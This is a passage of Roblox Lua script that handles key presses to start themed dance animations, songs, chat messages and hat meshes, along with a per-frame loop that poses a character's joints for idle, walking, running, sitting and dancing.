  835. bp.BrickColor = BrickColor.new("Dark stone grey")
  836. end
  837. end
  838. game:GetService("Chat"):Chat(head,"Nyan nyan nyan nyan!",0)
  839. hat = Instance.new("Part", char)
  840. hat.FormFactor = "Custom"
  841. hat.CanCollide = false
  842. hat.Size = head.Size
  843. hat.Locked = true
  844. hat.BrickColor = BrickColor.new("Dark stone grey")
  845. hat:breakJoints()
  846. local hatmesh = Instance.new("SpecialMesh", hat)
  847. hatmesh.MeshId = "http://www.roblox.com/asset/?id=1374148"
  848. hatmesh.TextureId = "http://www.roblox.com/asset/?id=117119031"
  849. hatmesh.Scale = Vector3.new(.2, .30, .2)
  850. local hatweld = Instance.new("Weld", hat)
  851. hatweld.Part0 = hat
  852. hatweld.Part1 = head
  853. hatweld.C0 = CFrame.new(0, -0.15, 0.05)
  854. end
  855. end
  856.  
  857. if k == "l" then
  858. if dancing then return end
  859. if not sitting then
  860. dancing = true
  861. game:GetService("Chat"):Chat(head,"wot fox sey?!",0)
  862. foxie = true
  863. fox_say:play()
  864. hat = Instance.new("Part", char)
  865. hat.FormFactor = "Custom"
  866. hat.CanCollide = false
  867. hat.Size = head.Size
  868. hat.Locked = true
  869. hat:breakJoints()
  870. local hatmesh = Instance.new("SpecialMesh", hat)
  871. hatmesh.MeshId = "http://www.roblox.com/asset/?id=25266225"
  872. hatmesh.TextureId = "http://www.roblox.com/asset/?id=25266210"
  873. hatmesh.Scale = Vector3.new(.2, .2, .2)
  874. local hatweld = Instance.new("Weld", hat)
  875. hatweld.Part0 = hat
  876. hatweld.Part1 = head
  877. hatweld.C0 = CFrame.new(0, -0.1, 0)
  878. end
  879.  
  880. end
  881. if k == "f" then
  882. if dancing then return end
  883. if not sitting then
  884. dancing = true
  885. game:GetService("Chat"):Chat(head,"Rainbow Factory!",0)
  886. durka = true
  887. durk:play()
  888. end
  889. end
  890. if k == "g" then
  891. if dancing then return end
  892. if not sitting then
  893. dancing = true
  894. game:GetService("Chat"):Chat(head,"Now for some more music",0)
  895. saxguy = true
  896. sax_guy:play()
  897. hat = Instance.new("Part", char)
  898. hat.FormFactor = "Custom"
  899. hat.CanCollide = false
  900. hat.Size = head.Size
  901. hat.Locked = true
  902. hat:breakJoints()
  903. local hatmesh = Instance.new("SpecialMesh", hat)
  904. hatmesh.MeshId = "http://www.roblox.com/asset/?id=44410178"
  905. hatmesh.TextureId = "http://www.roblox.com/asset/?id=44410320"
  906. hatmesh.Scale = Vector3.new(.25, .25, .25)
  907. local hatweld = Instance.new("Weld", hat)
  908. hatweld.Part0 = hat
  909. hatweld.Part1 = la
  910. hatweld.C0 = CFrame.new(-0.18, -0.05, .04) * CFrame.Angles(math.pi - math.rad(18), 0, math.pi/4)
  911. end
  912. end
  913.  
  914.  
  915.  
  916.  
  917. if k == "q" then
  918. if Vector3.new(torso.Velocity.x, 0, torso.Velocity.z).magnitude >= 14 then return end
  919. if sitting then return end
  920. looking = true
  921. game:GetService("Chat"):Chat(head,"I'm just tiltin",0)
  922. rj.C0 = CFrame.new(-math.pi/6, 0,0) * CFrame.Angles(0, 0, math.pi/4)
  923. end
  924. if k == "e" then
  925. if Vector3.new(torso.Velocity.x, 0, torso.Velocity.z).magnitude >= 14 then return end
  926. if sitting then return end
  927. looking = true
  928. game:GetService("Chat"):Chat(head,"What's wrong with tilting?",0)
  929. rj.C0 = CFrame.new(math.pi/6, 0,0) * CFrame.Angles(0, 0, -math.pi/4)
  930. end
  931. if string.byte(k) == 48 or string.byte(k) == 47 then
  932. if sitting then return end
  933. humanoid.WalkSpeed = 30
  934. end
  935. if string.byte(k) == 52 then
  936. if sitting then return end
  937. humanoid.WalkSpeed = 10
  938. end
  939. end)
  940.  
  941. mouse.KeyUp:connect(function(k)
  942. if string.byte(k) == 48 or string.byte(k) == 47 then
  943. if sitting then return end
  944. humanoid.WalkSpeed = 20
  945. end
  946. if string.byte(k) == 32 then
  947. game:GetService("Chat"):Chat(head,"Party's over! For now...",0)
  948. superannoying = false
  949. barrelroll = false
  950. heya = false
  951. dubstepgun = false
  952. youpirate = false
  953. canttouch = false
  954. gangnam = false
  955. sheddy = false
  956. durka = false
  957. saxguy = false
  958. foxie = false
  959. burndem = false
  960. bronymusic = false
  961. canttt = false
  962. brony_music:stop()
  963. cant:Stop()
  964. fox_say:stop()
  965. spitfire:stop()
  966. heman:stop()
  967. justin:stop()
  968. jb = false
  969. durk:stop()
  970. restorecolors()
  971. burn_dem:stop()
  972. if hat then
  973. hat:Destroy()
  974. end
  975. sax_guy:stop()
  976. gangy_style:stop()
  977. cant_touch:stop()
  978. you_are_pirate:stop()
  979. dubstep_gun:stop()
  980. super_annoying:stop()
  981. barrel_roll:stop()
  982. dancing = false
  983. global_wait = 0
  984. LightForTorso.Color = torso.BrickColor.Color
  985. end
  986.  
  987.  
  988. if k == "q" then
  989. if looking then
  990. if sitting then return end
  991. rj.C0 = CFrame.new()
  992. looking = false
  993. end
  994. end
  995.  
  996. if k == "e" then
  997. if looking then
  998. if sitting then return end
  999. rj.C0 = CFrame.new()
  1000. looking = false
  1001. end
  1002. end
  1003. end)
  1004.  
  1005.  
  1006. game:service'RunService'.Stepped:connect(function()
  1007. count = (count % 100) + countspeed
  1008. angle = math.pi * math.sin(math.pi*2/100*count)
  1009.  
  1010. if slidecount < slidecountmax then
  1011. slidecount = slidecount + speed
  1012. end
  1013. if slidecount > slidecountmax then
  1014. slidecount = slidecount - speed
  1015. end
  1016. if global_wait == 380 then global_wait = 0 end
  1017.  
  1018. sine = sine + sinespeed
  1019. if not dancing then
  1020. if not sitting then
  1021. local ray = Ray.new(rootpart.Position, Vector3.new(0, -1, 0))
  1022. local hitz, enz = workspace:FindPartOnRay(ray, char)
  1023. if not hitz then
  1024. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles((math.pi/8/5*slidecount) + math.pi + angle*0.05, 0, 0)
  1025. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles((math.pi/8/5*slidecount) + math.pi + -angle*0.05, 0, 0)
  1026. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(-angle*0.28, 0, 0)
  1027. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(angle*0.28, 0, 0)
  1028. if not looking then
  1029. rj.C0 = CFrame.new(0, 0, 0) * CFrame.Angles(-math.pi/8/5*slidecount, 0, 0)
  1030. end
  1031. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.pi/8/5*slidecount, 0, 0)
  1032. elseif Vector3.new(torso.Velocity.x, 0, torso.Velocity.z).magnitude < 2 then
  1033.  
  1034. -- idle anim
  1035.  
  1036. anim = "Idle"
  1037. if anim ~= lastanim then
  1038. if lastanim == "Walking" then
  1039. speed = 0.5
  1040. slidecount = 1
  1041. slidecountmax = 0
  1042. elseif lastanim == "Running" then
  1043. speed = 2.5
  1044. slidecount = 5
  1045. slidecountmax = 0
  1046. else
  1047. slidecount = 0
  1048. slidecountmax = 0
  1049. end
  1050. end
  1051. countspeed = 1
  1052. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(angle*0.02, 0, 0)
  1053. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(-angle*0.02, 0, 0)
  1054. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(-angle*0.01, 0, 0)
  1055. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(angle*0.01, 0, 0)
  1056. if not looking then
  1057. rj.C0 = CFrame.new(0, 0, 0) * CFrame.Angles(-math.pi/8/5*slidecount, 0, 0)
  1058. end
  1059. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.pi/8/5*slidecount, 0, 0)
  1060. elseif Vector3.new(torso.Velocity.x, 0, torso.Velocity.z).magnitude < 14 then
  1061. looking = false
  1062. -- walk anim
  1063. anim = "Walking"
  1064. if anim ~= lastanim then
  1065. speed = 0.2
  1066. slidecount = 0
  1067. slidecountmax = 1
  1068. if lastanim == "Running" then
  1069. slidecount = 5
  1070. end
  1071. end
  1072. countspeed = 6
  1073. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(angle*0.3, 0, math.abs(angle*0.02))
  1074. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(-angle*0.3, 0, -math.abs(angle*0.02))
  1075. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(-angle*0.28, 0, -math.abs(angle*0.01))
  1076. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(angle*0.28, 0, math.abs(angle*0.01))
  1077. rj.C0 = CFrame.new(0, math.abs(-angle*0.035), 0) * CFrame.Angles(-math.pi/8/5*slidecount, 0, 0)
  1078. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.pi/8/5*slidecount, 0, 0)
  1079. elseif Vector3.new(torso.Velocity.x, 0, torso.Velocity.z).magnitude >= 14 then
  1080. --run anim
  1081. anim = "Running"
  1082. if anim ~= lastanim then
  1083. speed = 1
  1084. slidecount = 0
  1085. slidecountmax = 5
  1086. if lastanim == "Walking" then
  1087. slidecount = 1
  1088. end
  1089. end
  1090.  
  1091. looking = false
  1092. countspeed = 9
  1093. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(angle*0.4, 0, math.abs(angle*0.07))
  1094. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(-angle*0.4, 0, -math.abs(angle*0.07))
  1095. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(-angle*0.38, 0, -math.abs(angle*0.03))
  1096. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(angle*0.38, 0, math.abs(angle*0.03))
  1097. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.pi/8/5*slidecount, 0, 0)
  1098. rj.C0 = CFrame.new(0, math.abs(-angle*.055), 0) * CFrame.Angles(-math.pi/8/5*slidecount, math.sin(angle*0.05), 0)
  1099. end
  1100.  
  1101. lastanim = anim
  1102. else
  1103. countspeed = 1
  1104. local ray = Ray.new(rootpart.Position, Vector3.new(0, -2, 0))
  1105. local hitz, enz = workspace:FindPartOnRay(ray, char)
  1106. if not hitz then
  1107. rj.C0 = CFrame.new(0, -0.5, 0) * CFrame.Angles(-math.pi/2, 0, 0)
  1108. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(math.rad(30), 0, -math.pi/16)
  1109. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(math.rad(30), 0, math.pi/16)
  1110. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(-math.pi-math.rad(30), 0, -math.pi/10)
  1111. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(-math.pi-math.rad(30), 0, math.pi/10)
  1112. else
  1113. rj.C0 = CFrame.new(0, -0.35, 0) * CFrame.Angles(math.rad(10), 0, 0)
  1114. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(math.pi/2-math.rad(10), 0, -math.pi/16)
  1115. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(math.pi/2-math.rad(10), 0, math.pi/16)
  1116. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(-math.rad(10), 0, -math.pi/10)
  1117. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(-math.rad(10), 0, math.pi/10)
  1118. end
  1119.  
  1120. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(angle*0.055, 0, 0)
  1121. end
  1122. else
  1123. if superannoying then
  1124. countspeed = 5
  1125. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi/2 + angle*0.2, 0, math.abs(angle*0.07))
  1126. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi/2 + angle*0.2, 0, -math.abs(angle*0.07))
  1127. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.1, 0, -math.abs(angle*0.03))
  1128. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.1, 0, math.abs(angle*0.03))
  1129. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  1130. rj.C0 = CFrame.new(0, math.abs(-angle*.035), 0) * CFrame.Angles(0, math.sin(angle*0.15), 0)
  1131. elseif barrelroll then
  1132. countspeed = 5
  1133. sinespeed = 0.1
  1134. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi + angle*0.2, 0, math.abs(angle*0.07))
  1135. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi + angle*0.2, 0, -math.abs(angle*0.07))
  1136. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(0, 0, -math.abs(angle*0.03))
  1137. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(0, 0, math.abs(angle*0.03))
  1138. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  1139. rj.C0 = CFrame.new(math.sin(sine)*2.5, 0, 0) * CFrame.Angles(-math.pi/2, math.sin(sine)*4.5, 0)
  1140. elseif dubstepgun then
  1141. global_wait = (global_wait % 380) + 1
  1142. countspeed = 5
  1143. if global_wait < 249 - 40 then
  1144. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi/2 + angle*0.2, 0, -math.abs(angle*0.27))
  1145. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi/2 + angle*0.2, 0, math.abs(angle*0.27))
  1146. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.1, 0, -math.abs(angle*0.03))
  1147. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.1, 0, math.abs(angle*0.03))
  1148. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  1149. rj.C0 = CFrame.new(0, math.abs(-angle*.035), 0) * CFrame.Angles(0, math.sin(angle*0.15), 0)
  1150. elseif global_wait > 249 - 40 then
  1151. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi/2 + angle*0.4, 0, math.abs(angle*0.11))
  1152. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi + angle*0.2, 0, -math.abs(angle*0.11))
  1153. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.1, 0, -math.abs(angle*0.09))
  1154. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.1, 0, math.abs(angle*0.09))
  1155. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  1156. rj.C0 = CFrame.new(0, math.abs(-angle*.075), 0) * CFrame.Angles(0, math.pi/3 + math.sin(angle*0.15), 0)
  1157. end
  1158. elseif youpirate then
  1159. global_wait = (global_wait % 380) + 1
  1160. countspeed = 5
  1161. if global_wait < 79 then
  1162. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi/2 + angle*0.1, 0, -math.abs(angle*0.07))
  1163. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(angle*0.2, 0, math.abs(angle*0.07))
  1164. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.1, 0, -math.abs(angle*0.03))
  1165. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.1, 0, math.abs(angle*0.03))
  1166. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  1167. rj.C0 = CFrame.new(0, math.abs(-angle*.02), 0) * CFrame.Angles(0, math.sin(angle*0.15), 0)
  1168. elseif global_wait < 299 then
  1169. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi + angle*0.2, 0, math.abs(angle*0.11))
  1170. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi + angle*0.2, 0, -math.abs(angle*0.11))
  1171. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.2, 0, -math.abs(angle*0.1))
  1172. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.2, 0, math.abs(angle*0.1))
  1173. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), math.sin(angle*0.19), 0)
  1174. rj.C0 = CFrame.new(0, math.abs(-angle*.055+0.2), 0) * CFrame.Angles(0, math.sin(angle*0.15), 0)
  1175. elseif global_wait > 299 then
  1176. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi/2 + angle*0.1, 0, -math.abs(angle*0.07))
  1177. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(angle*0.2, 0, math.abs(angle*0.07))
  1178. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.1, 0, -math.abs(angle*0.03))
  1179. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.1, 0, math.abs(angle*0.03))
  1180. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  1181. rj.C0 = CFrame.new(0, math.abs(-angle*.02), 0) * CFrame.Angles(0, math.sin(angle*0.15), 0)
  1182. end
  1183. elseif canttouch then
  1184. countspeed = 5
  1185. global_wait = (global_wait % 160) + 1
  1186. if global_wait == 160 then global_wait = 0 end
  1187. if global_wait < 39 then
  1188. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi/2 + angle*0.2, 0, -math.abs(angle*0.07))
  1189. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi/2 + angle*0.2, 0, math.abs(angle*0.07))
  1190. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.1, 0, -math.abs(angle*0.03))
  1191. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.1, 0, math.abs(angle*0.03))
  1192. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  1193. rj.C0 = CFrame.new(0, math.abs(-angle*.03), 0) * CFrame.Angles(0, -math.pi/6, 0)
  1194. elseif global_wait < 79 then
  1195. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi/2 + angle*0.2, 0, -math.abs(angle*0.07))
  1196. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi/2 + angle*0.2, 0, math.abs(angle*0.07))
  1197. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.1, 0, -math.abs(angle*0.03))
  1198. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.1, 0, math.abs(angle*0.03))
  1199. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  1200. rj.C0 = CFrame.new(0, math.abs(-angle*.03), 0) * CFrame.Angles(0, math.pi/6, 0)
  1201. elseif global_wait < 119 then
  1202. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(0.01, 0, 0.17)
  1203. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(0.01, 0, -0.17)
  1204. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(0, -math.abs(angle*0.05), -math.abs(angle*0.06))
  1205. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(0, -math.abs(angle*0.05), math.abs(angle*0.06))
  1206. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  1207. rj.C0 = CFrame.new(0, math.abs(-angle*.02), 0) * CFrame.Angles(0, 0, 0)
  1208. torso.CFrame = torso.CFrame * CFrame.new(0.05, 0, 0)
  1209. elseif global_wait > 119 then
  1210. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(0.01, 0, 0.17)
  1211. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(0.01, 0, -0.17)
  1212. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(0, -math.abs(angle*0.05), -math.abs(angle*0.06))
  1213. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(0, -math.abs(angle*0.05), math.abs(angle*0.06))
  1214. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  1215. rj.C0 = CFrame.new(0, math.abs(-angle*.02), 0) * CFrame.Angles(0, 0, 0)
  1216. torso.CFrame = torso.CFrame * CFrame.new(-0.05, 0, 0)
  1217. end
  1218. elseif gangnam then
  1219. countspeed = 5
  1220. if global_wait == 180 then global_wait = 0 end
  1221. global_wait = (global_wait % 180) + 1
  1222. if global_wait < 89 then
  1223. ls.C0 = CFrame.new(-.2,.1,-.1) * CFrame.Angles(math.pi/2.5 + math.abs(angle*0.2), 0, math.pi/3 + math.abs(angle*0.05))
  1224. rs.C0 = CFrame.new(.2,.1,-.1) * CFrame.Angles(math.pi/2.5 + math.abs(angle*0.2), 0, -math.pi/3 + -math.abs(angle*0.05))
  1225. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, -math.abs(angle*0.03))
  1226. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-math.abs(angle*0.1), 0, math.abs(angle*0.03))
  1227. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  1228. rj.C0 = CFrame.new(0, math.abs(-angle*.035), 0) * CFrame.Angles(0, math.sin(angle*0.05), 0)
  1229. elseif global_wait > 89 then
  1230. ls.C0 = CFrame.new(-.2,.1,-.1) * CFrame.Angles(math.pi/2.5 + math.abs(angle*0.2), 0, math.pi/3 + math.abs(angle*0.05))
  1231. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi + math.sin(angle*0.1), 0, -math.sin(angle*0.1))
  1232. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, -math.abs(angle*0.03))
  1233. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-math.abs(angle*0.1), 0, math.abs(angle*0.03))
  1234. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  1235. rj.C0 = CFrame.new(0, math.abs(-angle*.035), 0) * CFrame.Angles(0, math.sin(angle*0.05), 0)
  1236. end
  1237. elseif foxie then
  1238. countspeed = 5
  1239. global_wait = (global_wait % 380) + 2
  1240. if global_wait < 89 then
  1241. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi + math.abs(angle*0.1), 0, -math.abs(angle*0.2))
  1242. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi + math.abs(angle*0.1), 0, math.abs(angle*0.2))
  1243. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, -math.abs(angle*0.03))
  1244. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-math.abs(angle*0.1), 0, math.abs(angle*0.03))
  1245. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  1246. rj.C0 = CFrame.new(0, math.abs(-angle*.035), 0) * CFrame.Angles(0, math.rad(global_wait*4), 0)
  1247. elseif global_wait > 89 then
  1248. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi/2 + math.abs(angle*0.2), 0, math.abs(angle*0.05))
  1249. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi/2 + math.abs(angle*0.2), 0, -math.abs(angle*0.05))
  1250. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, -math.abs(angle*0.03))
  1251. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-math.abs(angle*0.1), 0, math.abs(angle*0.03))
  1252. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, math.sin(angle*0.1))
  1253. rj.C0 = CFrame.new(0, math.abs(-angle*.035), 0) * CFrame.Angles(0, math.sin(angle*0.05), 0)
  1254. end
  1255. elseif durka then
  1256. countspeed = 2
  1257. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi/2 + math.abs(angle*0.2), 0, math.abs(angle*0.07))
  1258. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(angle*0.1, 0, -math.abs(angle*0.07))
  1259. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.05, 0, -math.abs(angle*0.03))
  1260. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.05, 0, math.abs(angle*0.03))
  1261. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  1262. rj.C0 = CFrame.new(0, math.abs(-angle*.035), 0) * CFrame.Angles(0, math.sin(angle*0.05), 0)
  1263. elseif saxguy then
  1264. countspeed = 5
  1265. ls.C0 = CFrame.new(-.25,.1,-.1) * CFrame.Angles(math.pi/2.5, 0, math.pi/4)
  1266. rs.C0 = CFrame.new(.25,.1,-.1) * CFrame.Angles(math.rad(60), 0, -math.pi/4)
  1267. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(-math.abs(angle*0.1), 0, -0.06)
  1268. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-math.abs(angle*0.1), 0, 0.06)
  1269. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(0, 0, 0)
  1270. rj.C0 = CFrame.new(0, -math.abs(angle*0.01), math.abs(angle*0.01)) * CFrame.Angles(math.abs(angle*0.1), 0, 0)
  1271. elseif heya then
  1272. countspeed = 5
  1273. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi + -angle*0.2, -angle*0.1, 0)
  1274. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi + angle*0.2, angle*0.1, 0)
  1275. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.05, angle*0.1, -0.06)
  1276. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.05, -angle*0.1, 0.06)
  1277. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(0.2), 0, 0)
  1278. rj.C0 = CFrame.new(0, math.abs(angle*0.05), 0) * CFrame.Angles(0, math.sin(angle*0.07), 0)
  1279. elseif jb then
  1280. countspeed = 5
  1281. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi/2 + -angle*0.2, -angle*0.1, 0)
  1282. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi/2 + angle*0.2, angle*0.1, 0)
  1283. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.05, angle*0.1, -0.06)
  1284. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.05, -angle*0.1, 0.06)
  1285. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(0.2), 0, 0)
  1286. rj.C0 = CFrame.new(0, math.abs(angle*0.05), 0) * CFrame.Angles(0, math.abs(angle*0.1), 0)
  1287. elseif canttt then
  1288. countspeed = 5
  1289. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi/2 + -angle*0.2, -angle*0.1, 0)
  1290. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi/2 + angle*0.2, angle*0.1, 0)
  1291. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.05, angle*0.1, -0.06)
  1292. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.05, -angle*0.1, 0.06)
  1293. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(0.2), 0, 0)
  1294. rj.C0 = CFrame.new(0, math.abs(angle*0.05), 0) * CFrame.Angles(0, math.abs(angle*0.1), 0)
  1295. elseif bronymusic then
  1296. countspeed = 5
  1297. ls.C0 = CFrame.new(-.1,.1,-.15) * CFrame.Angles(math.pi/2 + -angle*0.1, -angle*0.1, 0)
  1298. rs.C0 = CFrame.new(.1,.1,-.15) * CFrame.Angles(math.pi/2 + angle*0.1, angle*0.1, 0)
  1299. lh.C0 = CFrame.new(-.1,-.25,0) * CFrame.Angles(math.pi/2 + angle*0.1, 0, 0)
  1300. rh.C0 = CFrame.new(.1,-.25,0) * CFrame.Angles(math.pi/2 + -angle*0.1, 0, 0)
  1301. neck.C0 = CFrame.new(0,.25,0) * CFrame.Angles(math.pi/2 + math.abs(angle*0.25), 0, 0)
  1302. rj.C0 = CFrame.new(0, -0.2 + math.abs(angle*0.05), 0) * CFrame.Angles(-math.rad(85), 0, 0)
  1303. elseif sheddy then
  1304. countspeed = 7
  1305. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi/4 + -angle*0.4, -angle*0.1, 0)
  1306. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi/4 + angle*0.4, angle*0.1, 0)
  1307. lh.C0 = CFrame.new(-.1,-.2,0) * CFrame.Angles(angle*0.05, angle*0.1, -0.06)
  1308. rh.C0 = CFrame.new(.1,-.2,0) * CFrame.Angles(-angle*0.05, -angle*0.1, 0.06)
  1309. neck.C0 = CFrame.new(0,.2,0) * CFrame.Angles(math.abs(0.2), 0, 0)
  1310. rj.C0 = CFrame.new(0, math.abs(angle*0.05), 0) * CFrame.Angles(0, math.abs(angle*0.1), 0)
  1311. elseif burndem then
  1312. countspeed = 4
  1313. ls.C0 = CFrame.new(-.3,.1,0) * CFrame.Angles(math.pi/4 + -angle*0.4, -angle*0.1, 0)
  1314. rs.C0 = CFrame.new(.3,.1,0) * CFrame.Angles(math.pi/4 + angle*0.4, angle*0.1, 0)
